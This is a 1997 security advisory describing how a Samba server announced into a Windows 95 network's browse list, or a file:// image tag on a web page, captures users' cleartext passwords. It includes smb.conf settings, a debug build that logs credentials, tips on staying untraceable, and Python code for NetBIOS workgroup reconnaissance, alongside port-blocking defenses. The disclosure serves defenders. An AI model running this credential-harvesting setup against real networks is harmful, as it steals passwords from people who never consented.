SMB Attacks on Windows 95
VERSIONS AFFECTED
Windows 95, with and without Internet Explorer.
DESCRIPTION
A newly reported problem allows a malicious Web site operator to capture a Windows 95 user's password in cleartext, given only the target network's IP address and workgroup name. The attack can be carried out in a way that leaves no noticeable trace on the victim's side, which makes it particularly dangerous.
A Master Browser can be used indirectly as a tool against the machines it serves by introducing a hostile host into the browse list. This exploit requires a Samba server, a Unix-based implementation of an SMB-compatible file server.
Samba servers can announce themselves to a remote network (workgroup) on a different subnet, given only the workgroup name. An intruder can use this in two ways to obtain a username and password. First, offer a share from the host that has been placed in the browse list and wait for a user to try to open it; at that point the user's username and password are transmitted. Second, embed a file:// reference in a Web page and wait for a user to visit that page; the Web browser then initiates an SMB connection to the server named in the file:// URL and promptly transmits the username and password. Sample HTML tag:
<img src="file://\\testsystem/testshare/testfile.gif">
TESTING
* Compile Samba using -DDEBUG_PASSWORD
* Use the remote announce option in the smb.conf file, specifying the remote host or broadcast address and the workgroup name of the network you wish to test. Sample [global] section:
[global]
   workgroup = TEST
   preferred master = yes
   domain master = yes
   security = user
   ; debug level 100 is what makes the DEBUG_PASSWORD build log credentials
   debug level = 100
   ; announce this server to the remote subnet's broadcast address, in the named workgroup
   remote announce = 10.0.0.255/WORKGROUP_NAME
* Establish a share on the Samba server. Sample share section:
[testt]
   path = /tmp
   ; not public, so the client must authenticate, which is what triggers the password transmission
   public = no
   browsable = yes
* If you wish, place one or more files in the directory, then start the Samba daemons (smbd and nmbd; nmbd is the one that sends the browse announcements). The Samba server will then announce itself to the remote network specified. If the remote network is successfully contacted, the Samba server may be added to that network's browse list.
Later, checking the Samba log will reveal any information it has collected about usernames and passwords. Entries will look similar to this:
checking user=[username] pass=[password]
DEFENSE
Even though you need the remote network's workgroup name before this type of attack can be mounted, keep in mind that this name can easily be obtained with the Windows nbtstat command (nbtstat -A <ip address> queries the name table of a remote host by IP address).
Also note that it is VERY easy for an attacker to hide completely during this attack by making a few minor adjustments to the hostname and /etc/hosts file of the Samba host, so the name that appears in the victim's browse list need not identify the attacker. In other words, in some circumstances this can be done in an untraceable fashion.
To stop this type of attack from outside your network (the Internet), block inbound traffic destined for UDP ports 137 and 138 and TCP port 139 at your border. Note that in the file:// variant the victim's browser opens the connection itself, so an inbound-only filter does not stop it; outbound traffic to ports 137, 138 and 139 should be blocked as well. Neither measure solves the problem when the attack comes from inside your network.
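The following is an added example, not code from the original advisory: it does in Python what nbtstat -A does, building a NetBIOS node status (NBSTAT) request for UDP port 137 and parsing the reply's name table to pull out the workgroup name an attacker needs for the remote announce option. The host name TESTSYS, workgroup TESTGRP and the MAC address in the sample reply are constructed values, not captured traffic; the network function at the end is optional and is not exercised offline.

```python
"""Added example (not part of the original advisory): NBSTAT request/response
handling, the same exchange `nbtstat -A <ip>` performs to learn a host's
workgroup. TESTSYS/TESTGRP and the MAC below are constructed sample data."""
import socket
import struct

NBSTAT_PORT = 137
WILDCARD_NAME = b"*" + b"\x00" * 15   # the "*" wildcard node name, padded to 16 bytes


def encode_nb_name(name):
    """First-level encoding (RFC 1001 section 14.1): each byte becomes two letters A..P."""
    out = bytearray()
    for b in name:
        out.append(ord("A") + (b >> 4))
        out.append(ord("A") + (b & 0x0F))
    # length-prefixed label followed by the root (zero-length) label
    return bytes([len(out)]) + bytes(out) + b"\x00"


def build_node_status_request(txid=0x1234):
    """Header: transaction id, flags 0 (plain query), QDCOUNT=1; one NBSTAT/IN question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = encode_nb_name(WILDCARD_NAME) + struct.pack("!HH", 0x0021, 0x0001)
    return header + question


def parse_node_status_response(data):
    """Return {'names': [(name, suffix, is_group), ...], 'mac': 'xx:xx:xx:xx:xx:xx'}."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a node status response")
    pos = 12
    label_len = data[pos]                      # answer RR name: skip the encoded label
    pos += 1 + label_len + 1
    rr_type, rr_class, ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
    pos += 10
    if rr_type != 0x0021:
        raise ValueError("unexpected RR type 0x%04x" % rr_type)
    num_names = data[pos]
    pos += 1
    names = []
    for _ in range(num_names):                 # 15-byte name, 1-byte suffix, 2-byte NAME_FLAGS
        raw = data[pos:pos + 15]
        suffix = data[pos + 15]
        name_flags = struct.unpack("!H", data[pos + 16:pos + 18])[0]
        names.append((raw.rstrip(b" ").decode("ascii", "replace"), suffix,
                      bool(name_flags & 0x8000)))   # 0x8000 = group name
        pos += 18
    mac = ":".join("%02x" % b for b in data[pos:pos + 6])   # statistics begin with the unit id
    return {"names": names, "mac": mac}


def workgroup_from_names(names):
    """The workgroup (or domain) is the group name with suffix <00> in the name table."""
    for name, suffix, is_group in names:
        if is_group and suffix == 0x00:
            return name
    return None


def build_sample_response(txid=0x1234):
    """Constructed reply (not captured traffic): host TESTSYS in workgroup TESTGRP."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    entries = [
        (b"TESTSYS", 0x00, 0x0400),   # unique: workstation name
        (b"TESTGRP", 0x00, 0x8400),   # group: workgroup name
        (b"TESTSYS", 0x20, 0x0400),   # unique: file server service
        (b"TESTGRP", 0x1E, 0x8400),   # group: browser election
    ]
    table = b"".join(n.ljust(15, b" ") + bytes([s]) + struct.pack("!H", f)
                     for n, s, f in entries)
    stats = bytes.fromhex("00a0c9112233") + b"\x00" * 40   # unit id (MAC), zeroed counters
    rdata = bytes([len(entries)]) + table + stats
    rr = encode_nb_name(WILDCARD_NAME) + struct.pack("!HHIH", 0x0021, 0x0001, 0, len(rdata))
    return header + rr + rdata


def query_node_status(ip, timeout=2.0):
    """Send the request to UDP/137 on a live host and parse the reply (needs network access)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_node_status_request(), (ip, NBSTAT_PORT))
        data, _ = sock.recvfrom(4096)
    finally:
        sock.close()
    return parse_node_status_response(data)
```

Run against a host with workgroup_from_names(query_node_status("10.0.0.5")["names"]); the point of the example is that the workgroup is volunteered to anyone who can reach UDP port 137, which is why the DEFENSE section's port filtering matters.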
Microsoft was informed of this problem on March 17, 1997. Watch this page for more information.
Credits
Discovered by Steve Birnbaum with help from Mark Gazit. Additional support from Yacov Drori and Roman Lasker. Thanks to hobbit for his paper on CIFS, thanks also to BioH for helping to test this, and to anyone else who helped or provided ideas.
Posted here at The NT Shop March 17, 1997 - 10:40pm